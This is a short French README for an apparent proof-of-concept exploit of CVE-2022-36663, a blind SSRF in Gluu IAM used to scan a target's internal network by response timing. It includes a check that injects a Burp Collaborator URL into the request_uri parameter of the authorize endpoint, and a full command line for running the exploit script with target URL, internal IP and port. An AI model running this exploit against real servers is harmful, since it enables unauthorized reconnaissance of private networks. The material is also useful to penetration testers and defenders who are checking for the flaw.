
Scanner de réseau interne via Gluu IAM blind ssrf
Scanner de réseau interne via une SSRF aveugle Gluu IAM
Gluu IAM est vulnérable à une SSRF aveugle qui peut être exploitée pour scanner le réseau interne à la recherche de ports ouverts en fonction des temps de réponse.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
Pour vérifier si la cible est vulnérable, ajoutez &request_uri=http://burpcollab à la requête /oxauth/restv1/authorize et interrogez le trafic entrant depuis le serveur cible.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - l'URL du serveur Gluu IAM
IP - L'adresse IP interne ou le sous-réseau que vous souhaitez scanner
Port - Le port interne que vous souhaitez scanner
AR - L'URL de la requête d'autorisation se terminant par un request_uri vide
